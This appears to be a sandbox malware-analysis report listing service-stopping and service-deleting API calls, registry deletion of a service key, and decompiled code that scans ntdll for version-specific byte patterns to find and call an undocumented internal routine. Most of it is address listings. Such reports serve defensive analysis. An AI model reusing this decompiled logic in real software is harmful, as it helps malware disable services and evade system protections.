                                                                                              0x00000000
                                                                                              0x04263acd
                                                                                              0x04263b03
                                                                                              0x04263b13
                                                                                              0x04263b2a
                                                                                              0x04263b3f
                                                                                              0x04263b45
                                                                                              0x04263b4a
                                                                                              0x04263b4b
                                                                                              0x00000000
                                                                                              0x04263b4b
                                                                                              0x04263ad9
                                                                                              0x04263ae4
                                                                                              0x04263aea
                                                                                              0x04263aea
                                                                                              0x04263af0
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04263A86
                                                                                              • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 04263AA2
                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 04263ABC
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 04263AD9
                                                                                              • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 04263AE4
                                                                                              • DeleteService.ADVAPI32(00000000,?,000F01FF), ref: 04263AFB
                                                                                              • wsprintfW.USER32 ref: 04263B2A
                                                                                              • SHDeleteKeyW.SHLWAPI(80000002,?), ref: 04263B3F
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04263B4B
                                                                                              • CloseServiceHandle.ADVAPI32(?,?,000F01FF), ref: 04263B57
                                                                                              Strings
                                                                                              • SYSTEM\CurrentControlSet\Services\%s, xrefs: 04263B24
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseDeleteHandleOpen$ControlManagerQuerySleepStatuswsprintf
                                                                                              • String ID: SYSTEM\CurrentControlSet\Services\%s
                                                                                              • API String ID: 3594024867-2757632955
                                                                                              • Opcode ID: 497585f648ba597113e27e01c6385c6181dda4cac151f2d9e8753c7e1ad7c266
                                                                                              • Instruction ID: b131ac555c47793d2f2688fe0f92f2f8e66b334ebc7650ea1973854177489f6e
                                                                                              • Opcode Fuzzy Hash: 497585f648ba597113e27e01c6385c6181dda4cac151f2d9e8753c7e1ad7c266
                                                                                              • Instruction Fuzzy Hash: 2E21B772B14119BBDB20AB68AC4DFBAB7BCFB04705F0400A9B90AD2141DE759D858FD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 49%
                                                                                              			E0425C9B0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				short _v12;
                                                                                              				char _v16;
                                                                                              				char _v18;
                                                                                              				short _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v28;
                                                                                              				signed int _v32;
                                                                                              				short _v36;
                                                                                              				char _v40;
                                                                                              				intOrPtr _v304;
                                                                                              				signed int _v308;
                                                                                              				intOrPtr _v312;
                                                                                              				char _v316;
                                                                                              				intOrPtr _v320;
                                                                                              				signed int _v324;
                                                                                              				signed int _t97;
                                                                                              				intOrPtr _t99;
                                                                                              				_Unknown_base(*)()* _t104;
                                                                                              				void* _t109;
                                                                                              				intOrPtr _t110;
                                                                                              				signed int _t111;
                                                                                              				void* _t112;
                                                                                              				void* _t117;
                                                                                              				void* _t123;
                                                                                              				void* _t128;
                                                                                              				void* _t131;
                                                                                              				void* _t135;
                                                                                              				void* _t138;
                                                                                              				void* _t141;
                                                                                              				signed int _t146;
                                                                                              				intOrPtr _t150;
                                                                                              				signed int _t156;
                                                                                              				signed int _t157;
                                                                                              				void* _t158;
                                                                                              				void* _t163;
                                                                                              				void* _t169;
                                                                                              				void* _t173;
                                                                                              				void* _t174;
                                                                                              				signed int _t177;
                                                                                              				void* _t178;
                                                                                              				void* _t179;
                                                                                              				intOrPtr* _t183;
                                                                                              				signed int _t184;
                                                                                              				signed int _t186;
                                                                                              				void* _t187;
                                                                                              				void* _t189;
                                                                                              				void* _t191;
                                                                                              				void* _t194;
                                                                                              				signed int _t197;
                                                                                              				void* _t198;
                                                                                              				char* _t200;
                                                                                              				void* _t202;
                                                                                              				struct HINSTANCE__* _t204;
                                                                                              				void* _t206;
                                                                                              				signed int _t207;
                                                                                              				signed int _t208;
                                                                                              				void* _t210;
                                                                                              				signed int _t212;
                                                                                              				void* _t215;
                                                                                              				void* _t217;
                                                                                              				void* _t218;
                                                                                              				void* _t220;
                                                                                              				signed int _t224;
                                                                                              
                                                                                              				_t187 = __edi;
                                                                                              				_t141 = __ebx;
                                                                                              				_t97 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t97 ^ _t224;
                                                                                              				_t99 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                              				if( *((intOrPtr*)(_t99 + 0xc0)) <= 0 ||  *((intOrPtr*)(_t99 + 0xc4)) <= 0) {
                                                                                              					L94:
                                                                                              					__eflags = _v8 ^ _t224;
                                                                                              					return E04275AFE(_v8 ^ _t224);
                                                                                              				} else {
                                                                                              					_t204 = GetModuleHandleA("ntdll");
                                                                                              					if(_t204 == 0) {
                                                                                              						L93:
                                                                                              						goto L94;
                                                                                              					} else {
                                                                                              						E0427DEA0(__edi,  &_v316, 0, 0x114);
                                                                                              						_t104 = GetProcAddress(_t204, "RtlGetVersion");
                                                                                              						if(_t104 == 0) {
                                                                                              							goto L93;
                                                                                              						} else {
                                                                                              							_push( &_v316);
                                                                                              							if( *_t104() != 0 || _t204->i != 0x5a4d) {
                                                                                              								goto L93;
                                                                                              							} else {
                                                                                              								_t183 =  *((intOrPtr*)(_t204 + 0x3c)) + _t204;
                                                                                              								if( *_t183 != 0x4550) {
                                                                                              									goto L93;
                                                                                              								} else {
                                                                                              									_t156 = 0;
                                                                                              									_t109 = ( *(_t183 + 0x14) & 0x0000ffff) + 0x18 + _t183;
                                                                                              									_t184 =  *(_t183 + 6) & 0x0000ffff;
                                                                                              									if(_t184 == 0) {
                                                                                              										goto L93;
                                                                                              									} else {
                                                                                              										while(( *(_t109 + 0x24) & 0x20000000) == 0) {
                                                                                              											_t156 = _t156 + 1;
                                                                                              											_t109 = _t109 + 0x28;
                                                                                              											if(_t156 < _t184) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												return E04275AFE(_v8 ^ _t224);
                                                                                              											}
                                                                                              											goto L95;
                                                                                              										}
                                                                                              										_t157 =  *(_t109 + 0x10);
                                                                                              										_v324 = _t157;
                                                                                              										_t186 =  *((intOrPtr*)(_t109 + 0xc)) + _t204;
                                                                                              										__eflags = _t186;
                                                                                              										if(_t186 == 0) {
                                                                                              											goto L93;
                                                                                              										} else {
                                                                                              											__eflags = _t157;
                                                                                              											if(_t157 == 0) {
                                                                                              												goto L93;
                                                                                              											} else {
                                                                                              												_t110 = _v312;
                                                                                              												_push(_t141);
                                                                                              												_push(_t187);
                                                                                              												__eflags = _t110 - 0xa;
                                                                                              												if(_t110 != 0xa) {
                                                                                              													__eflags = _t110 - 6;
                                                                                              													if(_t110 != 6) {
                                                                                              														goto L92;
                                                                                              													} else {
                                                                                              														_t111 = _v308;
                                                                                              														__eflags = _t111 - 3;
                                                                                              														if(_t111 == 3) {
                                                                                              															goto L49;
                                                                                              														} else {
                                                                                              															__eflags = _t111 - 2;
                                                                                              															if(_t111 != 2) {
                                                                                              																__eflags = _t111 - 1;
                                                                                              																if(_t111 != 1) {
                                                                                              																	goto L92;
                                                                                              																} else {
                                                                                              																	_v24 = 0x458d2074;
                                                                                              																	_t191 = _t157 - 8;
                                                                                              																	_v20 = 0x96a50d4;
                                                                                              																	_t210 = 0;
                                                                                              																	__eflags = 0;
                                                                                              																	do {
                                                                                              																		_t163 = 0;
                                                                                              																		__eflags = 0;
                                                                                              																		while(1) {
                                                                                              																			_t117 = _t163 + _t210;
                                                                                              																			__eflags =  *((intOrPtr*)(_t117 + _t186)) -  *((intOrPtr*)(_t224 + _t163 - 0x14));
                                                                                              																			if( *((intOrPtr*)(_t117 + _t186)) !=  *((intOrPtr*)(_t224 + _t163 - 0x14))) {
                                                                                              																				break;
                                                                                              																			}
                                                                                              																			_t163 = _t163 + 1;
                                                                                              																			__eflags = _t163 - 8;
                                                                                              																			if(_t163 < 8) {
                                                                                              																				continue;
                                                                                              																			}
                                                                                              																			break;
                                                                                              																		}
                                                                                              																		__eflags = _t163 - 8;
                                                                                              																		if(_t163 == 8) {
                                                                                              																			_t212 = _t210 + 0xffffffec + _t186;
                                                                                              																			__eflags = _t212;
                                                                                              																			if(_t212 == 0) {
                                                                                              																				goto L92;
                                                                                              																			} else {
                                                                                              																				 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                                                              																				 *_t212();
                                                                                              																				__eflags = _v8 ^ _t224;
                                                                                              																				return E04275AFE(_v8 ^ _t224, _t119);
                                                                                              																			}
                                                                                              																		} else {
                                                                                              																			goto L84;
                                                                                              																		}
                                                                                              																		goto L95;
                                                                                              																		L84:
                                                                                              																		_t210 = _t210 + 1;
                                                                                              																		__eflags = _t210 - _t191;
                                                                                              																	} while (_t210 <= _t191);
                                                                                              																	__eflags = _v8 ^ _t224;
                                                                                              																	return E04275AFE(_v8 ^ _t224);
                                                                                              																}
                                                                                              															} else {
                                                                                              																_t146 = 0;
                                                                                              																_v16 = 0x8908458b;
                                                                                              																_v12 = 0xa045;
                                                                                              																_t194 = _t157 - 6;
                                                                                              																_v32 = 0x23fb4868;
                                                                                              																_t215 = 0;
                                                                                              																__eflags = 0;
                                                                                              																_v28 = 0x6a;
                                                                                              																do {
                                                                                              																	_t169 = 0;
                                                                                              																	__eflags = 0;
                                                                                              																	while(1) {
                                                                                              																		_t123 = _t169 + _t215;
                                                                                              																		__eflags =  *((intOrPtr*)(_t123 + _t186)) -  *((intOrPtr*)(_t224 + _t169 - 0xc));
                                                                                              																		if( *((intOrPtr*)(_t123 + _t186)) !=  *((intOrPtr*)(_t224 + _t169 - 0xc))) {
                                                                                              																			break;
                                                                                              																		}
                                                                                              																		_t169 = _t169 + 1;
                                                                                              																		__eflags = _t169 - 6;
                                                                                              																		if(_t169 < 6) {
                                                                                              																			continue;
                                                                                              																		}
                                                                                              																		break;
                                                                                              																	}
                                                                                              																	__eflags = _t169 - 6;
                                                                                              																	if(_t169 == 6) {
                                                                                              																		_t146 = _t186 - 0xc + _t215;
                                                                                              																		__eflags = _t146;
                                                                                              																	} else {
                                                                                              																		goto L64;
                                                                                              																	}
                                                                                              																	L67:
                                                                                              																	__eflags = _t146;
                                                                                              																	if(_t146 != 0) {
                                                                                              																		L77:
                                                                                              																		 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                                                              																		 *_t146();
                                                                                              																		__eflags = _v8 ^ _t224;
                                                                                              																		return E04275AFE(_v8 ^ _t224, _t125);
                                                                                              																	} else {
                                                                                              																		_t217 = 0;
                                                                                              																		_t197 = _v324 + 0xfffffffb;
                                                                                              																		__eflags = _t197;
                                                                                              																		do {
                                                                                              																			_t173 = 0;
                                                                                              																			asm("o16 nop [eax+eax]");
                                                                                              																			while(1) {
                                                                                              																				_t128 = _t173 + _t217;
                                                                                              																				__eflags =  *((intOrPtr*)(_t128 + _t186)) -  *((intOrPtr*)(_t224 + _t173 - 0x1c));
                                                                                              																				if( *((intOrPtr*)(_t128 + _t186)) !=  *((intOrPtr*)(_t224 + _t173 - 0x1c))) {
                                                                                              																					break;
                                                                                              																				}
                                                                                              																				_t173 = _t173 + 1;
                                                                                              																				__eflags = _t173 - 5;
                                                                                              																				if(_t173 < 5) {
                                                                                              																					continue;
                                                                                              																				}
                                                                                              																				break;
                                                                                              																			}
                                                                                              																			__eflags = _t173 - 5;
                                                                                              																			if(_t173 == 5) {
                                                                                              																				_t146 = _t186 - 7 + _t217;
                                                                                              																				__eflags = _t146;
                                                                                              																			} else {
                                                                                              																				goto L73;
                                                                                              																			}
                                                                                              																			L76:
                                                                                              																			__eflags = _t146;
                                                                                              																			if(_t146 == 0) {
                                                                                              																				goto L92;
                                                                                              																			} else {
                                                                                              																				goto L77;
                                                                                              																			}
                                                                                              																			goto L95;
                                                                                              																			L73:
                                                                                              																			_t217 = _t217 + 1;
                                                                                              																			__eflags = _t217 - _t197;
                                                                                              																		} while (_t217 <= _t197);
                                                                                              																		goto L76;
                                                                                              																	}
                                                                                              																	goto L95;
                                                                                              																	L64:
                                                                                              																	_t215 = _t215 + 1;
                                                                                              																	__eflags = _t215 - _t194;
                                                                                              																} while (_t215 <= _t194);
                                                                                              																goto L67;
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              												} else {
                                                                                              													__eflags = _v308;
                                                                                              													if(_v308 != 0) {
                                                                                              														L92:
                                                                                              														goto L93;
                                                                                              													} else {
                                                                                              														_t150 = _v304;
                                                                                              														__eflags = _t150 - 0x3fab;
                                                                                              														if(_t150 <= 0x3fab) {
                                                                                              															__eflags = _t150 - 0x3ad7 - 0x4d4;
                                                                                              															if(_t150 - 0x3ad7 > 0x4d4) {
                                                                                              																__eflags = _t150 - 0x3ad7;
                                                                                              																if(_t150 >= 0x3ad7) {
                                                                                              																	goto L92;
                                                                                              																} else {
                                                                                              																	L49:
                                                                                              																	_v24 = 0x6a096a50;
                                                                                              																	_t189 = _t157 - 7;
                                                                                              																	_v20 = 0x8b01;
                                                                                              																	_t206 = 0;
                                                                                              																	__eflags = 0;
                                                                                              																	_v18 = 0xc1;
                                                                                              																	do {
                                                                                              																		_t158 = 0;
                                                                                              																		__eflags = 0;
                                                                                              																		while(1) {
                                                                                              																			_t112 = _t158 + _t206;
                                                                                              																			__eflags =  *((intOrPtr*)(_t112 + _t186)) -  *((intOrPtr*)(_t224 + _t158 - 0x14));
                                                                                              																			if( *((intOrPtr*)(_t112 + _t186)) !=  *((intOrPtr*)(_t224 + _t158 - 0x14))) {
                                                                                              																				break;
                                                                                              																			}
                                                                                              																			_t158 = _t158 + 1;
                                                                                              																			__eflags = _t158 - 7;
                                                                                              																			if(_t158 < 7) {
                                                                                              																				continue;
                                                                                              																			}
                                                                                              																			break;
                                                                                              																		}
                                                                                              																		__eflags = _t158 - 7;
                                                                                              																		if(_t158 == 7) {
                                                                                              																			_t207 = _t206 + 0xffffffe5;
                                                                                              																			__eflags = _t207;
                                                                                              																			goto L89;
                                                                                              																		} else {
                                                                                              																			goto L54;
                                                                                              																		}
                                                                                              																		goto L95;
                                                                                              																		L54:
                                                                                              																		_t206 = _t206 + 1;
                                                                                              																		__eflags = _t206 - _t189;
                                                                                              																	} while (_t206 <= _t189);
                                                                                              																	__eflags = _v8 ^ _t224;
                                                                                              																	return E04275AFE(_v8 ^ _t224);
                                                                                              																}
                                                                                              															} else {
                                                                                              																_v16 = 0x4d8dc18b;
                                                                                              																_t198 = _t157 - 6;
                                                                                              																_v12 = 0x51bc;
                                                                                              																_t218 = 0;
                                                                                              																__eflags = 0;
                                                                                              																do {
                                                                                              																	_t174 = 0;
                                                                                              																	__eflags = 0;
                                                                                              																	while(1) {
                                                                                              																		_t131 = _t174 + _t218;
                                                                                              																		__eflags =  *((intOrPtr*)(_t131 + _t186)) -  *((intOrPtr*)(_t224 + _t174 - 0xc));
                                                                                              																		if( *((intOrPtr*)(_t131 + _t186)) !=  *((intOrPtr*)(_t224 + _t174 - 0xc))) {
                                                                                              																			break;
                                                                                              																		}
                                                                                              																		_t174 = _t174 + 1;
                                                                                              																		__eflags = _t174 - 6;
                                                                                              																		if(_t174 < 6) {
                                                                                              																			continue;
                                                                                              																		}
                                                                                              																		break;
                                                                                              																	}
                                                                                              																	__eflags = _t174 - 6;
                                                                                              																	if(_t174 == 6) {
                                                                                              																		_t207 = _t218 + 0xffffffe8;
                                                                                              																		L89:
                                                                                              																		_t208 = _t207 + _t186;
                                                                                              																		__eflags = _t208;
                                                                                              																		goto L90;
                                                                                              																	} else {
                                                                                              																		goto L45;
                                                                                              																	}
                                                                                              																	goto L95;
                                                                                              																	L45:
                                                                                              																	_t218 = _t218 + 1;
                                                                                              																	__eflags = _t218 - _t198;
                                                                                              																} while (_t218 <= _t198);
                                                                                              																__eflags = _v8 ^ _t224;
                                                                                              																return E04275AFE(_v8 ^ _t224);
                                                                                              															}
                                                                                              														} else {
                                                                                              															_v16 = 0x4d8dc18b;
                                                                                              															_t200 =  &_v40;
                                                                                              															_v12 = 0x51ac;
                                                                                              															_v40 = 0xc085f633;
                                                                                              															_v36 = 0x379;
                                                                                              															_v24 = 0x85b04589;
                                                                                              															_v20 = 0x75c0;
                                                                                              															_v18 = 0x12;
                                                                                              															_v320 = 0x2c;
                                                                                              															__eflags = _t150 - 0x42ee;
                                                                                              															if(_t150 != 0x42ee) {
                                                                                              																__eflags = _t150 - 0x47ba;
                                                                                              																if(_t150 == 0x47ba) {
                                                                                              																	L20:
                                                                                              																	_v320 = 0x2e;
                                                                                              																} else {
                                                                                              																	__eflags = _t150 - 0x47bb;
                                                                                              																	if(_t150 == 0x47bb) {
                                                                                              																		goto L20;
                                                                                              																	}
                                                                                              																}
                                                                                              															} else {
                                                                                              																_t200 =  &_v16;
                                                                                              																_v320 = 0x18;
                                                                                              															}
                                                                                              															_t220 = 0;
                                                                                              															_t177 = _t157 + 0xfffffffa;
                                                                                              															__eflags = _t177;
                                                                                              															_v32 = _t177;
                                                                                              															do {
                                                                                              																_t178 = 0;
                                                                                              																asm("o16 nop [eax+eax]");
                                                                                              																while(1) {
                                                                                              																	_t135 = _t178 + _t220;
                                                                                              																	__eflags =  *((intOrPtr*)(_t135 + _t186)) -  *((intOrPtr*)(_t178 + _t200));
                                                                                              																	if( *((intOrPtr*)(_t135 + _t186)) !=  *((intOrPtr*)(_t178 + _t200))) {
                                                                                              																		break;
                                                                                              																	}
                                                                                              																	_t178 = _t178 + 1;
                                                                                              																	__eflags = _t178 - 6;
                                                                                              																	if(_t178 < 6) {
                                                                                              																		continue;
                                                                                              																	}
                                                                                              																	break;
                                                                                              																}
                                                                                              																__eflags = _t178 - 6;
                                                                                              																if(_t178 == 6) {
                                                                                              																	_t208 = _t220 - _v320 + _t186;
                                                                                              																	__eflags = _t208;
                                                                                              																} else {
                                                                                              																	goto L26;
                                                                                              																}
                                                                                              																L29:
                                                                                              																__eflags = _t208;
                                                                                              																if(_t208 != 0) {
                                                                                              																	L91:
                                                                                              																	 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                                                              																	 *_t208();
                                                                                              																} else {
                                                                                              																	__eflags = _t150 - 0x4a61;
                                                                                              																	if(_t150 == 0x4a61) {
                                                                                              																		_v32 = 0;
                                                                                              																		_t202 = _v324 + 0xfffffff9;
                                                                                              																		asm("o16 nop [eax+eax]");
                                                                                              																		do {
                                                                                              																			_t179 = 0;
                                                                                              																			__eflags = 0;
                                                                                              																			while(1) {
                                                                                              																				_t138 = _t179 + _t208;
                                                                                              																				__eflags =  *((intOrPtr*)(_t138 + _t186)) -  *((intOrPtr*)(_t224 + _t179 - 0x14));
                                                                                              																				if( *((intOrPtr*)(_t138 + _t186)) !=  *((intOrPtr*)(_t224 + _t179 - 0x14))) {
                                                                                              																					break;
                                                                                              																				}
                                                                                              																				_t179 = _t179 + 1;
                                                                                              																				__eflags = _t179 - 7;
                                                                                              																				if(_t179 < 7) {
                                                                                              																					continue;
                                                                                              																				}
                                                                                              																				break;
                                                                                              																			}
                                                                                              																			__eflags = _t179 - 7;
                                                                                              																			if(_t179 == 7) {
                                                                                              																				_t208 = _t208 + 0xffffffd8 + _t186;
                                                                                              																				__eflags = _t208;
                                                                                              																			} else {
                                                                                              																				goto L36;
                                                                                              																			}
                                                                                              																			L90:
                                                                                              																			if(__eflags != 0) {
                                                                                              																				goto L91;
                                                                                              																			}
                                                                                              																			goto L92;
                                                                                              																			L36:
                                                                                              																			_t208 = _t208 + 1;
                                                                                              																			__eflags = _t208 - _t202;
                                                                                              																		} while (_t208 <= _t202);
                                                                                              																		_t208 = _v32;
                                                                                              																		__eflags = _t208;
                                                                                              																		goto L90;
                                                                                              																	}
                                                                                              																}
                                                                                              																goto L92;
                                                                                              																L26:
                                                                                              																_t220 = _t220 + 1;
                                                                                              																__eflags = _t220 - _v32;
                                                                                              															} while (_t220 <= _v32);
                                                                                              															_t208 = 0;
                                                                                              															goto L29;
                                                                                              														}
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L95:
                                                                                              			}



































































                                                                                              0x0425c9b0
                                                                                              0x0425c9b0
                                                                                              0x0425c9b9
                                                                                              0x0425c9c0
                                                                                              0x0425c9c3
                                                                                              0x0425c9cd
                                                                                              0x0425cdfe
                                                                                              0x0425ce01
                                                                                              0x0425ce0b
                                                                                              0x0425c9e0
                                                                                              0x0425c9ec
                                                                                              0x0425c9f0
                                                                                              0x0425cdfd
                                                                                              0x00000000
                                                                                              0x0425c9f6
                                                                                              0x0425ca04
                                                                                              0x0425ca12
                                                                                              0x0425ca1a
                                                                                              0x00000000
                                                                                              0x0425ca20
                                                                                              0x0425ca26
                                                                                              0x0425ca2b
                                                                                              0x00000000
                                                                                              0x0425ca3f
                                                                                              0x0425ca42
                                                                                              0x0425ca4a
                                                                                              0x00000000
                                                                                              0x0425ca50
                                                                                              0x0425ca54
                                                                                              0x0425ca59
                                                                                              0x0425ca5b
                                                                                              0x0425ca61
                                                                                              0x00000000
                                                                                              0x0425ca67
                                                                                              0x0425ca67
                                                                                              0x0425ca70
                                                                                              0x0425ca71
                                                                                              0x0425ca76
                                                                                              0x00000000
                                                                                              0x0425ca78
                                                                                              0x0425ca86
                                                                                              0x0425ca86
                                                                                              0x00000000
                                                                                              0x0425ca76
                                                                                              0x0425ca8c
                                                                                              0x0425ca8f
                                                                                              0x0425ca95
                                                                                              0x0425ca95
                                                                                              0x0425ca97
                                                                                              0x00000000
                                                                                              0x0425ca9d
                                                                                              0x0425ca9d
                                                                                              0x0425ca9f
                                                                                              0x00000000
                                                                                              0x0425caa5
                                                                                              0x0425caa5
                                                                                              0x0425caab
                                                                                              0x0425caac
                                                                                              0x0425caad
                                                                                              0x0425cab0
                                                                                              0x0425cc85
                                                                                              0x0425cc88
                                                                                              0x00000000
                                                                                              0x0425cc8e
                                                                                              0x0425cc8e
                                                                                              0x0425cc94
                                                                                              0x0425cc97
                                                                                              0x00000000
                                                                                              0x0425cc99
                                                                                              0x0425cc99
                                                                                              0x0425cc9c
                                                                                              0x0425cd58
                                                                                              0x0425cd5b
                                                                                              0x00000000
                                                                                              0x0425cd61
                                                                                              0x0425cd61
                                                                                              0x0425cd68
                                                                                              0x0425cd6b
                                                                                              0x0425cd72
                                                                                              0x0425cd72
                                                                                              0x0425cd74
                                                                                              0x0425cd74
                                                                                              0x0425cd74
                                                                                              0x0425cd76
                                                                                              0x0425cd76
                                                                                              0x0425cd7c
                                                                                              0x0425cd80
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cd82
                                                                                              0x0425cd83
                                                                                              0x0425cd86
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cd86
                                                                                              0x0425cd88
                                                                                              0x0425cd8b
                                                                                              0x0425cda8
                                                                                              0x0425cda8
                                                                                              0x0425cdaa
                                                                                              0x00000000
                                                                                              0x0425cdac
                                                                                              0x0425cdc1
                                                                                              0x0425cdc4
                                                                                              0x0425cdcc
                                                                                              0x0425cdd6
                                                                                              0x0425cdd6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cd8d
                                                                                              0x0425cd8d
                                                                                              0x0425cd8e
                                                                                              0x0425cd8e
                                                                                              0x0425cd98
                                                                                              0x0425cda2
                                                                                              0x0425cda2
                                                                                              0x0425cca2
                                                                                              0x0425cca2
                                                                                              0x0425cca4
                                                                                              0x0425ccab
                                                                                              0x0425ccb1
                                                                                              0x0425ccb4
                                                                                              0x0425ccbb
                                                                                              0x0425ccbb
                                                                                              0x0425ccbd
                                                                                              0x0425ccc1
                                                                                              0x0425ccc1
                                                                                              0x0425ccc1
                                                                                              0x0425ccc3
                                                                                              0x0425ccc3
                                                                                              0x0425ccc9
                                                                                              0x0425cccd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cccf
                                                                                              0x0425ccd0
                                                                                              0x0425ccd3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425ccd3
                                                                                              0x0425ccd5
                                                                                              0x0425ccd8
                                                                                              0x0425cce4
                                                                                              0x0425cce4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cce6
                                                                                              0x0425cce6
                                                                                              0x0425cce8
                                                                                              0x0425cd2b
                                                                                              0x0425cd40
                                                                                              0x0425cd43
                                                                                              0x0425cd4b
                                                                                              0x0425cd55
                                                                                              0x0425ccea
                                                                                              0x0425ccf0
                                                                                              0x0425ccf2
                                                                                              0x0425ccf2
                                                                                              0x0425ccf5
                                                                                              0x0425ccf5
                                                                                              0x0425ccf7
                                                                                              0x0425cd00
                                                                                              0x0425cd00
                                                                                              0x0425cd06
                                                                                              0x0425cd0a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cd0c
                                                                                              0x0425cd0d
                                                                                              0x0425cd10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cd10
                                                                                              0x0425cd12
                                                                                              0x0425cd15
                                                                                              0x0425cd21
                                                                                              0x0425cd21
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cd23
                                                                                              0x0425cd23
                                                                                              0x0425cd25
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cd17
                                                                                              0x0425cd17
                                                                                              0x0425cd18
                                                                                              0x0425cd18
                                                                                              0x00000000
                                                                                              0x0425cd1c
                                                                                              0x00000000
                                                                                              0x0425ccda
                                                                                              0x0425ccda
                                                                                              0x0425ccdb
                                                                                              0x0425ccdb
                                                                                              0x00000000
                                                                                              0x0425ccdf
                                                                                              0x0425cc9c
                                                                                              0x0425cc97
                                                                                              0x0425cab6
                                                                                              0x0425cab6
                                                                                              0x0425cabd
                                                                                              0x0425cdfb
                                                                                              0x00000000
                                                                                              0x0425cac3
                                                                                              0x0425cac3
                                                                                              0x0425cac9
                                                                                              0x0425cacf
                                                                                              0x0425cbda
                                                                                              0x0425cbdf
                                                                                              0x0425cc2c
                                                                                              0x0425cc32
                                                                                              0x00000000
                                                                                              0x0425cc38
                                                                                              0x0425cc38
                                                                                              0x0425cc38
                                                                                              0x0425cc3f
                                                                                              0x0425cc42
                                                                                              0x0425cc48
                                                                                              0x0425cc48
                                                                                              0x0425cc4a
                                                                                              0x0425cc50
                                                                                              0x0425cc50
                                                                                              0x0425cc50
                                                                                              0x0425cc52
                                                                                              0x0425cc52
                                                                                              0x0425cc58
                                                                                              0x0425cc5c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cc5e
                                                                                              0x0425cc5f
                                                                                              0x0425cc62
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cc62
                                                                                              0x0425cc64
                                                                                              0x0425cc67
                                                                                              0x0425cdd9
                                                                                              0x0425cdd9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cc6d
                                                                                              0x0425cc6d
                                                                                              0x0425cc6e
                                                                                              0x0425cc6e
                                                                                              0x0425cc78
                                                                                              0x0425cc82
                                                                                              0x0425cc82
                                                                                              0x0425cbe1
                                                                                              0x0425cbe1
                                                                                              0x0425cbe8
                                                                                              0x0425cbeb
                                                                                              0x0425cbf1
                                                                                              0x0425cbf1
                                                                                              0x0425cbf3
                                                                                              0x0425cbf3
                                                                                              0x0425cbf3
                                                                                              0x0425cbf5
                                                                                              0x0425cbf5
                                                                                              0x0425cbfb
                                                                                              0x0425cbff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cc01
                                                                                              0x0425cc02
                                                                                              0x0425cc05
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cc05
                                                                                              0x0425cc07
                                                                                              0x0425cc0a
                                                                                              0x0425cc24
                                                                                              0x0425cddc
                                                                                              0x0425cddc
                                                                                              0x0425cddc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cc0c
                                                                                              0x0425cc0c
                                                                                              0x0425cc0d
                                                                                              0x0425cc0d
                                                                                              0x0425cc17
                                                                                              0x0425cc21
                                                                                              0x0425cc21
                                                                                              0x0425cad5
                                                                                              0x0425cad5
                                                                                              0x0425cadc
                                                                                              0x0425cadf
                                                                                              0x0425cae5
                                                                                              0x0425caec
                                                                                              0x0425caf2
                                                                                              0x0425caf9
                                                                                              0x0425caff
                                                                                              0x0425cb03
                                                                                              0x0425cb0d
                                                                                              0x0425cb13
                                                                                              0x0425cb24
                                                                                              0x0425cb2a
                                                                                              0x0425cb34
                                                                                              0x0425cb34
                                                                                              0x0425cb2c
                                                                                              0x0425cb2c
                                                                                              0x0425cb32
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cb32
                                                                                              0x0425cb15
